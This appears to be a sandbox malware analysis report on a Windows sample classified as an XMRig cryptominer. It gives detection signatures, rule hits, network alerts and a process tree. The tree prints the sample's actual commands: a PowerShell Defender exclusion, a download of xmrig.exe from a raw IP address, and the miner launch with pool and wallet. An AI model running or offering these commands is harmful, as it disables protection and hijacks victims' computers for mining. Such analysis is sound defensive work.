Edit tour
Windows
Analysis Report
file.exe
Overview
General Information
| Sample name: | file.exe |
| Analysis ID: | 1583472 |
| MD5: | cab92c144fd667cef7315c451bed854b |
| SHA1: | 532ec7af97764480129b12f75f9f8c1eeb570cb8 |
| SHA256: | 49f94ed44fa9a834f246a5a038aa971b26f928d32ed438faacccba2398753297 |
| Tags: | exeuser-jstrosch |
| Infos: |   |
 | |
Detection
Xmrig
| Score: | 100 |
| Range: | 0 - 100 |
| Whitelisted: | false |
| Confidence: | 100% |
Signatures
Antivirus detection for URL or domain
Antivirus detection for dropped file
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Xmrig
Yara detected Xmrig cryptocurrency miner
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
DNS related to crypt mining pools
Detected Stratum mining protocol
Found strings related to Crypto-Mining
Loading BitLocker PowerShell Module
Machine Learning detection for sample
Powershell drops PE file
Query firmware table information (likely to detect VMs)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Suspicious powershell command line found
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: PowerShell Web Download
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Invoke-WebRequest Execution With DirectIP
Sigma detected: Usage Of Web Request Commands And Cmdlets
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match
Classification
- System is w10x64
file.exe (PID: 7568 cmdline: "C:\Users\ user\Deskt op\file.ex e" MD5: CAB92C144FD667CEF7315C451BED854B) 
cmd.exe (PID: 7584 cmdline: cmd /c pow ershell -i nputformat none -out putformat none -NonI nteractive -Command Add-MpPref erence -Ex clusionPat h "C:\WinX RAR" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 7600 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) 
powershell.exe (PID: 7676 cmdline: powershell -inputfor mat none - outputform at none -N onInteract ive -Comma nd Add-MpP reference -Exclusion Path "C:\W inXRAR" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC) 
WmiPrvSE.exe (PID: 7820 cmdline: C:\Windows \system32\ wbem\wmipr vse.exe -s ecured -Em bedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51) - cmd.exe (PID: 7880 cmdline:
cmd /c pow ershell In voke-WebRe quest -Uri http://45 .125.67.16 8/stelin/x mrig.exe - Outfile C: \WinXRAR\x mrig.exe MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 7888 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 7924 cmdline:
powershell Invoke-We bRequest - Uri http:/ /45.125.67 .168/steli n/xmrig.ex e -Outfile C:\WinXRA R\xmrig.ex e MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC) 
xmrig.exe (PID: 8188 cmdline: C:\WinXRAR \xmrig.exe -o xmr-us -east1.nan opool.org: 14444 -u 4 7n193Tag3F HULdsD1HYm YGPdfCpquh dci1Rq2L4g R4U5Diq8oX 6ny73xRqb4 DwWYBTuQQF 3Xa36AQFNj CCX71nAMeY iG4t -p x --algo rx/ 0 MD5: CB166D49CE846727ED70134B589B0142) - conhost.exe (PID: 7188 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- file.exe (PID: 8088 cmdline:
"C:\Users\ user\Deskt op\file.ex e" MD5: CAB92C144FD667CEF7315C451BED854B)
- file.exe (PID: 4872 cmdline:
"C:\Users\ user\Deskt op\file.ex e" MD5: CAB92C144FD667CEF7315C451BED854B) - xmrig.exe (PID: 4476 cmdline:
C:\WinXRAR \xmrig.exe -o xmr-us -east1.nan opool.org: 14444 -u 4 7n193Tag3F HULdsD1HYm YGPdfCpquh dci1Rq2L4g R4U5Diq8oX 6ny73xRqb4 DwWYBTuQQF 3Xa36AQFNj CCX71nAMeY iG4t -p x --algo rx/ 0 MD5: CB166D49CE846727ED70134B589B0142) - conhost.exe (PID: 1380 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- cleanup
| Name | Description | Attribution | Blogpost URLs | Link |
|---|---|---|---|---|
| xmrig | According to PCrisk, XMRIG is a completely legitimate open-source application that utilizes system CPUs to mine Monero cryptocurrency. Unfortunately, criminals generate revenue by infiltrating this app into systems without users' consent. This deceptive marketing method is called "bundling".In most cases, "bundling" is used to infiltrate several potentially unwanted programs (PUAs) at once. So, there is a high probability that XMRIG Virus came with a number of adware-type applications that deliver intrusive ads and gather sensitive information. | No Attribution |
⊘No configs have been found
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| JoeSecurity_Xmrig | Yara detected Xmrig cryptocurrency miner | Joe Security |
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| JoeSecurity_Xmrig | Yara detected Xmrig cryptocurrency miner | Joe Security | ||
| Linux_Trojan_Pornoasset_927f314f | unknown | unknown |
| |
| MacOS_Cryptominer_Xmrig_241780a1 | unknown | unknown |
|
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| JoeSecurity_Xmrig | Yara detected Xmrig cryptocurrency miner | Joe Security | ||
| Linux_Trojan_Pornoasset_927f314f | unknown | unknown |
| |
| MacOS_Cryptominer_Xmrig_241780a1 | unknown | unknown |
| |
| MAL_XMR_Miner_May19_1 | Detects Monero Crypto Coin Miner | Florian Roth |
| |
| MALWARE_Win_CoinMiner02 | Detects coinmining malware | ditekSHen |
|
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| JoeSecurity_Xmrig | Yara detected Xmrig cryptocurrency miner | Joe Security | ||
| JoeSecurity_Xmrig | Yara detected Xmrig cryptocurrency miner | Joe Security | ||
| JoeSecurity_Xmrig | Yara detected Xmrig cryptocurrency miner | Joe Security | ||
| JoeSecurity_Xmrig | Yara detected Xmrig cryptocurrency miner | Joe Security | ||
| JoeSecurity_Xmrig | Yara detected Xmrig cryptocurrency miner | Joe Security | ||
| Click to see the 38 entries | ||||
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| JoeSecurity_Xmrig | Yara detected Xmrig cryptocurrency miner | Joe Security | ||
| JoeSecurity_Xmrig | Yara detected Xmrig cryptocurrency miner | Joe Security | ||
| JoeSecurity_Xmrig | Yara detected Xmrig cryptocurrency miner | Joe Security | ||
| JoeSecurity_Xmrig | Yara detected Xmrig cryptocurrency miner | Joe Security | ||
| JoeSecurity_Xmrig | Yara detected Xmrig cryptocurrency miner | Joe Security | ||
| Click to see the 11 entries | ||||
Bitcoin Miner |   |
|---|
| Source: | Author: Joe Security: | ||
System Summary | |
|---|
| Source: | Author: Florian Roth (Nextron Systems): | ||
| Source: | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): | ||
| Source: | Author: frack113, Nasreddine Bencherchali (Nextron Systems): | ||
| Source: | Author: Florian Roth (Nextron Systems): | ||
| Source: | Author: Florian Roth (Nextron Systems): | ||
| Source: | Author: Nasreddine Bencherchali (Nextron Systems): | ||
| Source: | Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: | ||
| Source: | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): | ||
| Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
|---|---|---|---|---|---|---|---|---|
| 2025-01-02T20:24:31.225608+0100 | 2826930 | 2 | Crypto Currency Mining Activity Detected | 192.168.2.9 | 49849 | 51.222.200.133 | 14444 | TCP |
| Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
|---|---|---|---|---|---|---|---|---|
| 2025-01-02T20:22:27.309947+0100 | 2829056 | 2 | Crypto Currency Mining Activity Detected | 192.168.2.9 | 49760 | 45.125.67.168 | 80 | TCP |
| Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
|---|---|---|---|---|---|---|---|---|
| 2025-01-02T20:22:27.309960+0100 | 1810003 | 2 | Potentially Bad Traffic | 45.125.67.168 | 80 | 192.168.2.9 | 49760 | TCP |
| Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
|---|---|---|---|---|---|---|---|---|
| 2025-01-02T20:22:27.309947+0100 | 1810000 | 2 | Potentially Bad Traffic | 192.168.2.9 | 49760 | 45.125.67.168 | 80 | TCP |
Click to jump to signature section
Show All Signature Results
AV Detection | |
|---|
| Source: | Avira URL Cloud: | ||
| Source: | Avira: | ||
| Source: | ReversingLabs: | ||
| Source: | ReversingLabs: | ||
| Source: | Integrated Neural Analysis Model: | ||
| Source: | Joe Sandbox ML: | ||
Bitcoin Miner | |
|---|
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | DNS query: | ||
| Source: | TCP traffic: | ||
| Source: | TCP traffic: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | Static PE information: | ||
| Source: | Static PE information: | ||
| Source: | Binary string: | ||
| Source: | Code function: | 0_2_002CA461 | |
| Source: | TCP traffic: | ||
| Source: | HTTP traffic detected: | ||